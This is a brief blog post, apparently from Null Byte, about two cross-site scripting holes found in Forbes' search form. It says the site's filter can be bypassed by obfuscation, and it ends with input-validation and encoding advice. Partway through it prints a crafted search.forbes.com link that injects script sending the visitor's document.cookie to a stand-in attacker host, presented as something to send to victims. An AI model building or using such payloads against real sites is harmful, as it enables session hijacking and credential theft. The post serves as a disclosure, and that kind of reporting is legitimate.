Forbes Exploited: XSS Vulnerabilities Allow Phishers to Hijack Sessions & Steal Logins
Here's another delicious Byte. Ucha Gobejishvili, a Georgian Security Researcher under the handle of longrifle0x, discovered two cross site scripting (XSS) vulnerabilities on the official website of Forbes. He discovered the hole in two different locations on the site, and has already informed the website of the vulnerability.
The first of the two holes is located within the search form of Forbes. You can reach it at the following URL:
Using some obfuscation, it easily gets around Forbes' protection.
The second hole is located at yet another script within the search form on Forbes.
Again, using simple obfuscation, we see it slide right past their protection.
You could send a nasty URL to someone in a link on another website, and it would look pretty innocent.
<a href="http://search.forbes.com/search/colArchiveSearch?author=%22%3E%3Cscript%3Ealert%28document.location=" rel="nofollow" target="_blank" http://yoursite.com/whateveryouwant.php?cookie=" + document.cookie%29%3C/script%3E</script>
Forbes should validate all their forms, headers, and cookies. They should also convert scripts and script tags to a non-executable form by disallowing the use of special characters, which is what we used for obduscation. Only display output to the browser that has been sufficiently encoded. When possible, avoid simple character filters and write routines that whitelist accepted characters. Use regular expressions to confirm that data conforms to the allowed character set. This enhances application security, and makes it harder to bypass input validation routines.
Want more Null Byte?